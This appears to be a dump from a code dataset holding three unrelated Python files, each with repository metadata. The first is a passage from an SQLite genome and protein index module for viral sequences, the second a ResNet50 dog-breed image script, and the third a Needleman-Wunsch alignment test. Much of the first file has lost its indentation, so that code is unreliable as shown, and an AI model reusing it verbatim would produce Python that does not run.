print(' %s (%s) is a fungus-only virus.' %
(genome.id, genome.description), file=logfp)
continue
else:
if logfp:
print(' %s (%s) is not a fungus-only virus.' %
(genome.id, genome.description), file=logfp)
if excludePlantOnlyViruses:
if lineage is None:
print('Could not look up taxonomy lineage for %s '
'(%s). Cannot confirm as plant-only virus. '
'Skipping.' %
(genome.id, genome.description), file=logfp)
else:
if taxonomyDatabase.isPlantOnlyVirus(
lineage, genome.description):
if logfp:
print(' %s (%s) is a plant-only virus.' %
(genome.id, genome.description), file=logfp)
continue
else:
if logfp:
print(' %s (%s) is not a plant-only virus.' %
(genome.id, genome.description), file=logfp)
if excludeExclusiveHosts:
if taxonomyId is None:
print('Could not find taxonomy id for %s (%s). '
'Cannot exclude due to exclusive host criteria.' %
(genome.id, genome.description), file=logfp)
else:
hosts = taxonomyDatabase.hosts(taxonomyId)
if hosts is None:
print('Could not find hosts for %s (%s). Cannot '
'exclude due to exclusive host criteria.' %
(genome.id, genome.description), file=logfp)
else:
if len(hosts) == 1:
host = hosts.pop()
if host in excludeExclusiveHosts:
print(
'Excluding %s (%s) due to exclusive '
'host criteria (infects only %s hosts).' %
(genome.id, genome.description, host),
file=logfp)
continue
proteinCount = len(list(self._genomeProteins(genome)))
if self.addGenome(
genome, source, taxonomyId, proteinCount, databaseName,
duplicationPolicy=duplicationPolicy, logfp=logfp):
self.addProteins(
genome, source, proteinSource=proteinSource,
genomeSource=genomeSource,
duplicationPolicy=duplicationPolicy, logfp=logfp)
addedProteinCount += proteinCount
addedGenomeCount += 1
print(' Added %s (%s) with %d protein%s to database.' %
(genome.id, genome.description, proteinCount,
'' if proteinCount == 1 else 's'), file=logfp)
return examinedGenomeCount, addedGenomeCount, addedProteinCount
def addGenome(self, genome, source, taxonomyId, proteinCount, databaseName,
duplicationPolicy='error', logfp=None):
"""
Add information about a genome to the genomes table.
@param genome: A GenBank genome record, as parsed by SeqIO.parse
@param source: A C{dict} containing genome source information, as
returned by C{self._sourceInfo}.
@param taxonomyId: Either an C{int} taxonomy id or C{None} if the
genome taxonomy could not be looked up.
@param proteinCount: The C{int} number of proteins in the genome.
@param databaseName: A C{str} indicating the database the records
in C{filename} came from (e.g., 'refseq' or 'RVDB').
@param duplicationPolicy: A C{str} indicating what to do if a
to-be-inserted accession number is already present in the database.
"error" results in a ValueError being raised, "ignore" means ignore
the duplicate. It should also be possible to update (i.e., replace)
but that is not supported yet.
@param logfp: If not C{None}, a file pointer to write verbose
progress output to.
@raise DatabaseDuplicationError: If a duplicate accession number is
encountered and C{duplicationPolicy} is 'error'.
@return: C{True} if the genome was added, else C{False}.
"""
sequence = str(genome.seq)
try:
self._connection.execute(
'INSERT INTO genomes(accession, organism, name, sequence, '
'length, proteinCount, host, note, taxonomyId, databaseName) '
'VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)',
(genome.id, source['organism'], genome.description,
sequence, len(sequence), proteinCount, source['host'],
source.get('note'), taxonomyId, databaseName))
except sqlite3.IntegrityError as e:
if str(e).find('UNIQUE constraint failed') > -1:
if duplicationPolicy == 'error':
raise DatabaseDuplicationError(
'Genome information for %r already present in '
'database: %s' % (genome.id, e))
elif duplicationPolicy == 'ignore':
if logfp:
print(
'Genome information for %r already present in '
'database. Ignoring: %s' % (genome.id, e),
file=logfp)
return False
else:
raise NotImplementedError(
'Unknown duplication policy (%s) found when '
'attempting to insert genome information for %s.' %
(duplicationPolicy, genome.id))
else:
raise
else:
return True
def addProteins(self, genome, source, proteinSource='GENBANK',
genomeSource='GENBANK', duplicationPolicy='error',
logfp=None):
"""
Add proteins from a Genbank genome record to the proteins database and
write out their sequences to the proteins FASTA file (in
C{self._fastaFp}).
@param genome: Either a GenBank genome record, as parsed by
C{SeqIO.parse} or a C{_Genome} instance (which behaves like the
former).
@param source: A C{dict} containing genome source information, as
returned by C{self._sourceInfo}.
@param proteinSource: A C{str} giving the source of the protein
accession number. This becomes part of the sequence id printed
in the protein FASTA output.
@param genomeSource: A C{str} giving the source of the genome
accession number. This becomes part of the sequence id printed
in the protein FASTA output.
@param duplicationPolicy: A C{str} indicating what to do if a
to-be-inserted accession number is already present in the database.
"error" results in a ValueError being raised, "ignore" means ignore
the duplicate. It should also be possible to update (i.e., replace)
but that is not supported yet.
@param logfp: If not C{None}, a file pointer to write verbose
progress output to.
@raise DatabaseDuplicationError: If a duplicate accession number is
encountered and C{duplicationPolicy} is 'error'.
"""
genomeLen = len(genome.seq)
for fInfo in self._genomeProteins(genome, logfp=logfp):
# Write FASTA for the protein.
seqId = self.SEQUENCE_ID_SEPARATOR.join((
self.SEQUENCE_ID_PREFIX,
proteinSource, fInfo['proteinId'],
genomeSource, genome.id,
fInfo['product']))
print('>%s [%s]\n%s' %
(seqId, source['organism'], fInfo['translation']),
file=self._fastaFp)
self.addProtein(
fInfo['proteinId'], genome.id, fInfo['translation'],
fInfo['featureLocation'], fInfo['forward'],
fInfo['circular'],
fInfo['ranges'].distinctRangeCount(genomeLen),
gene=fInfo['gene'], note=fInfo['note'],
product=fInfo['product'], duplicationPolicy=duplicationPolicy,
logfp=logfp)
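    # Note (added, illustrative): with the class-level SEQUENCE_ID_PREFIX and
    # SEQUENCE_ID_SEPARATOR defined earlier in this file, the seqId built above
    # has the '|'-delimited form shown in the SqliteIndex docstrings below,
    # e.g. (hypothetical accession numbers)
    #     >civ|GENBANK|YP_009137150.1|GENBANK|NC_007605.1|putative capsid protein [Some organism]
    # so the protein accession sits in field 2 and the genome accession in
    # field 4, which is exactly what SqliteIndex.proteinAccession() and
    # SqliteIndex.genomeAccession() parse.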
def addProtein(self, accession, genomeAccession, sequence, offsets,
forward, circular, rangeCount, gene=None, note=None,
product=None, duplicationPolicy='error', logfp=None):
"""
Add information about a protein to the proteins table.
@param accession: A C{str} protein accession id.
@param genomeAccession: A C{str} genome accession id (the genome to
which this protein belongs).
@param sequence: A C{str} protein amino acid sequence.
@param offsets: A C{str} describing the offsets of the protein in the
genome (as obtained from C{SeqIO.parse} on a GenBank file).
@param forward: A C{bool}, C{True} if the protein occurs on the
forward strand of the genome, C{False} if on the complement strand.
Note that this is converted to an C{int} in the database.
@param circular: A C{bool}, C{True} if the protein crosses the genome
boundary and is therefore circular, C{False} if not. Note that
this is converted to an C{int} in the database.
@param rangeCount: The C{int} number of ranges (regions) the protein
comes from in the genome.
@param gene: A C{str} gene name, or C{None} if no gene is known.
@param note: A C{str} note about the protein, or C{None}.
@param product: A C{str} description of the protein product (e.g.,
"putative replication initiation protein"), or C{None}.
@param duplicationPolicy: A C{str} indicating what to do if a
to-be-inserted accession number is already present in the database.
"error" results in a ValueError being raised, "ignore" means ignore
the duplicate. It should also be possible to update (i.e., replace)
but that is not supported yet.
@param logfp: If not C{None}, a file pointer to write verbose
progress output to.
@raise DatabaseDuplicationError: If a duplicate accession number is
encountered and C{duplicationPolicy} is 'error'.
"""
try:
self._connection.execute(
'INSERT INTO proteins('
'accession, genomeAccession, sequence, length, offsets, '
'forward, circular, rangeCount, gene, note, product) '
'VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)',
(accession, genomeAccession, sequence, len(sequence), offsets,
int(forward), int(circular), rangeCount, gene, note, product))
except sqlite3.IntegrityError as e:
if str(e).find('UNIQUE constraint failed') > -1:
if duplicationPolicy == 'error':
raise DatabaseDuplicationError(
'Protein information for %r already present in '
'database.' % accession)
elif duplicationPolicy == 'ignore':
if logfp:
print(
'Protein information for %r already present in '
'database. Ignoring.' % accession, file=logfp)
else:
raise NotImplementedError(
'Unknown duplication policy (%s) found when '
'attempting to insert protein information for %s.' %
(duplicationPolicy, accession))
else:
raise
else:
if logfp:
print(' Protein %s: genome=%s product=%s' % (
accession, genomeAccession, product), file=logfp)
def _sourceInfo(self, genome, logfp):
"""
Extract summary information from a genome source feature.
@param genome: A GenBank genome record, as parsed by SeqIO.parse
@param logfp: If not C{None}, a file pointer to write verbose
progress output to.
@return: A C{dict} with keys for the various pieces of information
(if any) found in the source feature (see the return value below
for detail). Or C{None} if no source feature is found or a source
feature does not have length 1.
"""
result = {}
for feature in genome.features:
if feature.type == 'source':
for key in 'host', 'note', 'organism', 'mol_type':
try:
values = feature.qualifiers[key]
except KeyError:
value = None
if key != 'note':
print('Genome %r (accession %s) source info has '
'no %r feature.' %
(genome.description, genome.id, key),
file=logfp)
else:
if len(values) == 1:
value = values[0]
if key == 'mol_type':
assert value[-3:] in ('DNA', 'RNA')
elif len(values) > 1 and key == 'host':
value = ', '.join(values)
else:
print('Genome %r (accession %s) has source '
'feature %r with length != 1: %r' % (
genome.description, genome.id, key,
values), file=logfp)
return
result[key] = value
break
else:
print('Genome %r (accession %s) had no source feature! '
'Skipping.' % (genome.description, genome.id), file=logfp)
return
return result
def _cdsInfo(self, genome, feature, logfp=None):
"""
Extract summary information from a genome CDS feature.
@param genome: A GenBank genome record, as parsed by SeqIO.parse
@param feature: A feature from a genome, as produced by BioPython's
GenBank parser.
@param logfp: If not C{None}, a file pointer to write verbose
progress output to.
@return: A C{dict} with keys for the various pieces of information
found in the feature (see the return value below for detail).
Or C{None} if the feature is not of interest or otherwise invalid.
"""
qualifiers = feature.qualifiers
# Check in advance that all feature qualifiers we're interested in
# have the right lengths, if they're present.
for key in 'gene', 'note', 'product', 'protein_id', 'translation':
if key in qualifiers:
assert len(qualifiers[key]) == 1, (
'GenBank qualifier key %s is not length one %r' %
(key, qualifiers[key]))
# A protein id is mandatory.
if 'protein_id' in qualifiers:
proteinId = qualifiers['protein_id'][0]
else:
if 'translation' in qualifiers:
warn('Genome %r (accession %s) has CDS feature with no '
'protein_id feature but has a translation! '
'Skipping.\nFeature: %s' %
(genome.description, genome.id, feature))
return
# A translated (i.e., amino acid) sequence is mandatory.
if 'translation' in qualifiers:
translation = qualifiers['translation'][0]
else:
warn('Genome %r (accession %s) has CDS feature with protein '
'%r with no translated sequence. Skipping.' %
(genome.description, genome.id, proteinId))
return
featureLocation = str(feature.location)
# Make sure the feature's location string can be parsed.
try:
ranges = GenomeRanges(featureLocation)
except ValueError as e:
warn('Genome %r (accession %s) contains unparseable CDS '
'location for protein %r. Skipping. Error: %s' %
(genome.description, genome.id, proteinId, e))
return
else:
# Does the protein span the end of the genome? This indicates a
# circular genome.
circular = int(ranges.circular(len(genome.seq)))
if feature.location.start >= feature.location.end:
warn('Genome %r (accession %s) contains feature with start '
'(%d) >= stop (%d). Skipping.\nFeature: %s' %
(genome.description, genome.id, feature.location.start,
feature.location.end, feature))
return
strand = feature.strand
if strand is None:
# The strands of the protein in the genome are not all the same
# (see Bio.SeqFeature.CompoundLocation._get_strand). The
# protein is formed by the combination of reading one strand in
# one direction and the other in the other direction.
#
# This occurs just once in all 1.17M proteins found in all 700K
# RVDB (C-RVDBv15.1) genomes, for protein YP_656697.1 on the
# Ranid herpesvirus 1 strain McKinnell genome (NC_008211.1).
#
# This situation makes turning DIAMOND protein output into
# SAM very complicated because a match on such a protein
# cannot be stored as a SAM linear alignment. It instead
# requires a multi-line 'supplementary' alignment. The code
# and tests for that are more complex than I want to deal
# with at the moment, just for the sake of one protein in a
# frog herpesvirus.
warn('Genome %s (accession %s) has protein %r with mixed '
'orientation!' % (genome.description, genome.id,
proteinId))
return
elif strand == 0:
# This never occurs for proteins corresponding to genomes in
# the RVDB database C-RVDBv15.1.
warn('Genome %r (accession %s) has protein %r with feature '
'with strand of zero!' %
(genome.description, genome.id, proteinId))
return
else:
assert strand in (1, -1)
forward = strand == 1
# Make sure the strand agrees with the orientations in the
# string BioPython makes out of the locations.
assert ranges.orientations() == {forward}
return {
'circular': circular,
'featureLocation': featureLocation,
'forward': forward,
'gene': qualifiers.get('gene', [''])[0],
'note': qualifiers.get('note', [''])[0],
'product': qualifiers.get('product', ['UNKNOWN'])[0],
'proteinId': proteinId,
'ranges': ranges,
'strand': strand,
'translation': translation,
}
def _genomeProteins(self, genome, logfp=None):
"""
Get proteins (CDS features) that we can process from a genome, along
with information extracted from each.
@param genome: A GenBank genome record, as parsed by SeqIO.parse
@param logfp: If not C{None}, a file pointer to write verbose
progress output to.
@return: A generator yielding feature info C{dict}s as returned by
C{self._cdsInfo}.
"""
for feature in genome.features:
if feature.type == 'CDS':
                featureInfo = self._cdsInfo(genome, feature, logfp=logfp)
if featureInfo:
yield featureInfo
def close(self):
"""
        Create indices on the accession ids and close the connection.
"""
cur = self._connection.cursor()
cur.execute('CREATE UNIQUE INDEX IF NOT EXISTS protein_idx ON '
'proteins(accession)')
cur.execute('CREATE UNIQUE INDEX IF NOT EXISTS genomes_idx ON '
'genomes(accession)')
self._connection.commit()
self._connection.close()
self._connection = None
def __enter__(self):
return self
def __exit__(self, excType, excValue, traceback):
self.close()
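# Illustrative sketch (added; not part of the original module): __enter__ and
# __exit__ above let the writer be used as a context manager, so that close()
# -- which creates the accession indices and commits -- always runs. The
# constructor arguments and the full addGenomes() signature are defined
# earlier in this file; the keyword arguments below are taken from the
# addGenomes() docstring and the values are hypothetical.
#
#     with SqliteIndexWriter('proteins-genomes.db') as writer:
#         examined, added, proteins = writer.addGenomes(
#             genomes,
#             databaseName='refseq',
#             dnaOnly=True,
#             duplicationPolicy='ignore',
#             logfp=sys.stderr)
#         print('Added %d of %d genomes examined, with %d proteins.' %
#               (added, examined, proteins))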
class SqliteIndex(object):
"""
Provide lookup access to an Sqlite3 database holding information about
proteins and the genomes they come from.
@param dbFilenameOrConnection: Either a C{str} file name containing an
sqlite3 database as created by C{SqliteIndexWriter} or an already
open connection to such a database. Note that an already open
connection will not be closed by self.close().
@param lookupCacheSize: The C{int} size of the memoization cache
for the protein and genome lookup functions (each has its own
memoization cache).
"""
PROTEIN_ACCESSION_FIELD = 2
GENOME_ACCESSION_FIELD = 4
def __init__(self, dbFilenameOrConnection, lookupCacheSize=1024):
if isinstance(dbFilenameOrConnection, string_types):
self._connection = sqlite3.connect(dbFilenameOrConnection)
self._closeConnection = True
else:
self._connection = dbFilenameOrConnection
self._closeConnection = False
self._connection.row_factory = sqlite3.Row
self._proteinCache = LRUCache(maxsize=lookupCacheSize)
self._genomeCache = LRUCache(maxsize=lookupCacheSize)
def genomeAccession(self, id_):
"""
Get the genome accession info from a sequence id.
@param id_: A C{str} sequence id in the form
'civ|GENBANK|%s|GENBANK|%s|%s [%s]' where the genome accession
is in the fifth '|'-separated field.
@raise IndexError: If C{id_} does not have enough |-separated fields.
@return: The C{str} accession number.
"""
return id_.split('|', self.GENOME_ACCESSION_FIELD + 1)[
self.GENOME_ACCESSION_FIELD]
def proteinAccession(self, id_):
"""
Get the protein accession info from a sequence id.
@param id_: A C{str} sequence id in the form
'civ|GENBANK|%s|GENBANK|%s|%s [%s]' where the protein accession
is in the third '|'-separated field.
@raise IndexError: If C{id_} does not have enough |-separated fields.
@return: The C{str} accession number.
"""
return id_.split('|', self.PROTEIN_ACCESSION_FIELD + 1)[
self.PROTEIN_ACCESSION_FIELD]
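    # For example (hypothetical accession numbers), an id such as
    #     'civ|GENBANK|YP_009137150.1|GENBANK|NC_007605.1|putative capsid protein [host]'
    # splits on '|' so that proteinAccession() returns field 2
    # ('YP_009137150.1') and genomeAccession() returns field 4 ('NC_007605.1').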
@cachedmethod(attrgetter('_genomeCache'))
def _findGenome(self, accession):
"""
Find info about a genome, given an accession number.
@param accession: A C{str} accession number.
@return: A C{dict} with keys corresponding to the names of the columns
            in the genomes database table, else C{None} if C{accession}
            cannot be found.
"""
cur = self.execute(
'SELECT * FROM genomes WHERE accession = ?', (accession,))
row = cur.fetchone()
if row:
result = dict(row)
# TODO: the following line can be removed, I think.
result['accession'] = accession
return result
def findGenome(self, id_):
"""
Find info about a genome, given a sequence id.
@param id_: A C{str} sequence id. This is either of the form
'civ|GENBANK|%s|GENBANK|%s|%s [%s]' where the genome id is in the
5th '|'-delimited field, or else is the nucleotide sequence
accession number as already extracted.
@return: A C{dict} with keys corresponding to the names of the columns
in the genomes database table, else C{None} if C{id_} cannot be
found.
"""
try:
accession = self.genomeAccession(id_)
except IndexError:
accession = id_
return self._findGenome(accession)
@cachedmethod(attrgetter('_proteinCache'))
def _findProtein(self, accession):
"""
Find info about a protein, given an accession number.
@param accession: A C{str} accession number.
@return: A C{dict} with keys corresponding to the names of the columns
            in the proteins database table, else C{None} if C{accession}
            cannot be found.
"""
cur = self.execute(
'SELECT * FROM proteins WHERE accession = ?', (accession,))
row = cur.fetchone()
if row:
result = dict(row)
result['forward'] = bool(result['forward'])
result['circular'] = bool(result['circular'])
result['length'] = int(result['length'])
# TODO: the following line can be removed, I think.
result['accession'] = accession
return result
def findProtein(self, id_):
"""
Find info about a protein, given a sequence id.
@param id_: A C{str} sequence id. This is either of the form
'civ|GENBANK|%s|GENBANK|%s|%s [%s]' where the protein id is in the
3rd '|'-delimited field, or else is the protein accession number as
already extracted.
@return: A C{dict} with keys corresponding to the names of the columns
in the proteins database table, else C{None} if C{id_} cannot be
found.
"""
try:
accession = self.proteinAccession(id_)
except IndexError:
accession = id_
return self._findProtein(accession)
def _yieldProteins(self, rows, cur):
"""
Helper function for self.findProteinsForGenome.
@param rows: A C{list} of protein database lookup results.
@param cur: An sqlite3 cursor.
@return: A generator that yields C{dict}s with keys corresponding to
the names of the columns in the proteins database table.
"""
while rows:
for row in rows:
result = dict(row)
result['forward'] = bool(result['forward'])
result['circular'] = bool(result['circular'])
result['length'] = int(result['length'])
yield result
rows = cur.fetchmany()
def findProteinsForGenome(self, id_):
"""
Find all proteins for a genome id.
@param id_: A C{str} sequence id. This is either of the form
'civ|GENBANK|%s|GENBANK|%s|%s [%s]' where the genome id is in the
5th '|'-delimited field, or else is the nucleotide sequence
accession number as already extracted.
@return: A generator that yields C{dict}s with keys corresponding to
the names of the columns in the proteins database table, else
C{None} if C{id_} cannot be found.
"""
try:
accession = self.genomeAccession(id_)
except IndexError:
accession = id_
cur = self.execute(
'SELECT * FROM proteins WHERE genomeAccession = ?', (accession,))
rows = cur.fetchmany()
if rows:
return self._yieldProteins(rows, cur)
def execute(self, query, *args):
"""
Execute an SQL statement. See
https://docs.python.org/3.5/library/sqlite3.html#sqlite3.Cursor.execute
for full argument details.
@param query: A C{str} SQL query.
@param args: Additional arguments (if any) to pass to the sqlite3
execute command.
@return: An sqlite3 cursor.
"""
cur = self._connection.cursor()
cur.execute(query, *args)
return cur
def proteinCount(self):
"""
How many proteins are in the database?
@return: An C{int} protein count.
"""
cur = self.execute('SELECT COUNT(1) FROM proteins')
return int(cur.fetchone()[0])
def genomeCount(self):
"""
How many genomes are in the database?
@return: An C{int} genome count.
"""
cur = self.execute('SELECT COUNT(1) FROM genomes')
return int(cur.fetchone()[0])
def close(self):
"""
Close the database connection (if we opened it).
"""
if self._closeConnection:
self._connection.close()
self._connection = None
def __enter__(self):
return self
def __exit__(self, excType, excValue, traceback):
self.close()
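# Illustrative usage sketch (added; not part of the original module). The
# database filename and the genome accession number are hypothetical; every
# method and column name used below is defined by SqliteIndex and by the
# tables populated by SqliteIndexWriter above.
if __name__ == '__main__':
    with SqliteIndex('proteins-genomes.db') as index:
        print('Database holds %d genomes and %d proteins.' %
              (index.genomeCount(), index.proteinCount()))
        # findGenome accepts either a full 'civ|...' sequence id or a bare
        # genome accession number.
        genome = index.findGenome('NC_007605.1')
        if genome:
            print('%s: %s (%d proteins)' %
                  (genome['accession'], genome['organism'],
                   genome['proteinCount']))
            for protein in index.findProteinsForGenome(genome['accession']) or []:
                print('  %s: %s' % (protein['accession'], protein['product']))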
|
[
"terry@jon.es"
] |
terry@jon.es
|
5759589b01f465b82f2aa6d757c4e39a3912f334
|
5169e62e414dd0a1109627e2270c684ab5650cef
|
/exp_Resnet50.py
|
454296ba5bb6d4f49e38971379de5a3d28e8474c
|
[
"MIT"
] |
permissive
|
MFajcik/Dog-Breed-Classification
|
f39ff3976d8731dfc13ff32f4383460bd20bb4c9
|
047bc02443962b6a9b04adb5f17f648579bce95c
|
refs/heads/master
| 2021-07-20T03:42:24.438758
| 2017-10-22T22:09:57
| 2017-10-22T22:09:57
| 107,796,811
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,282
|
py
|
import numpy as np
import matplotlib.pyplot as plt
from keras.applications import ResNet50
from keras.applications.vgg16 import preprocess_input, decode_predictions
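# Note (added): preprocess_input and decode_predictions are imported from
# keras.applications.vgg16 but used with ResNet50 below. Both models use the
# same 'caffe'-style ImageNet preprocessing in Keras (RGB->BGR plus mean
# subtraction), so this should behave the same as importing them from
# keras.applications.resnet50, which would make the intent clearer.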
import prologue
from mpl_toolkits.axes_grid1 import ImageGrid
data_dir = r"C:\\Users\\mfajc\\Kaggle\\DogBreeds"
#data_dir = r"/home/ifajcik/kaggle/dog_breed_classification/dogbreed_data"
labels, _, _, _, _ = prologue.init(data_dir)
NUM_CLASSES = 16
# plot image figure via ImageGrid
fig = plt.figure(1, figsize=(16, 16))
j = int(np.sqrt(NUM_CLASSES))
i = int(np.ceil(NUM_CLASSES / j))
grid = ImageGrid(fig, 111, nrows_ncols=(i, j), axes_pad=0.05)
#Pretrained resnet
model = ResNet50(weights='imagenet')
for i, (img_id, breed) in enumerate(labels.loc[labels['rank'] == 1, ['id', 'breed']].values):
ax = grid[i]
img = prologue.read_img(data_dir,img_id, 'train', (224, 224))
x = preprocess_input(img.copy())
ax.imshow(img / 255.)
    x = np.expand_dims(x, axis=0)  # Use the preprocessed copy, with a batch dimension added.
preds = model.predict(x)
_, imagenet_class_name, prob = decode_predictions(preds, top=1)[0][0]
ax.text(10, 180, 'ResNet50: %s (%.2f)' % (imagenet_class_name , prob), color='w', backgroundcolor='k', alpha=0.8)
ax.text(10, 200, 'LABEL: %s' % breed, color='k', backgroundcolor='w', alpha=0.8)
ax.axis('off')
plt.show()
|
[
"blackened226@gmail.com"
] |
blackened226@gmail.com
|
1a9a57d460894cd25864c5122caf1b2a8e214682
|
a0c54e54533f34f56f312ec10dfa2fce31719315
|
/needleman_wunsch_test.py
|
12b95cafaa71bf1ab52c7d9e471be459bb82326d
|
[] |
no_license
|
rediska0123/Needleman-Wunsch-algorithm
|
7e43dca51fd652f2ef32b69625cef6a8d153ecfb
|
4b38c0538136d6439d032df724b8d2df07bd5781
|
refs/heads/master
| 2022-12-12T00:04:08.537893
| 2020-09-10T19:29:43
| 2020-09-10T19:29:43
| 294,461,151
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 611
|
py
|
import pytest
from needleman_wunsch import get_max_score_alignment
import numpy as np
def test_get_max_score_alignment():
m = np.array([[10, -1, -3, -4],
[-1, 7, -5, -3],
[-3, -5, 9, 0],
[-4, -3, 0, 8]])
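    # The function under test presumably implements the standard
    # Needleman-Wunsch recurrence with substitution matrix m and linear gap
    # penalty d:
    #     F[i][j] = max(F[i-1][j-1] + m[x_i][y_j],  # (mis)match
    #                   F[i-1][j] + d,              # gap in dna2
    #                   F[i][j-1] + d)              # gap in dna1
    # For instance, aligning "G" against the empty string admits only a single
    # gap, which gives the expected score of d = -5 in the last test case.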
tests = [
("GTTACAA", "GACGTTT", -5, 1.0, "GTTACAA--", "G--ACGTTT"),
("G", "G", 10, 20.0, "-G", "G-"),
("G", "", -5, -5, "G", "-"),
]
for dna1, dna2, d, expected_score, aligned_dna1, aligned_dna2 in tests:
assert get_max_score_alignment(dna1, dna2, m, d) == (expected_score, aligned_dna1, aligned_dna2)
|
[
"rediska0123@gmail.com"
] |
rediska0123@gmail.com
|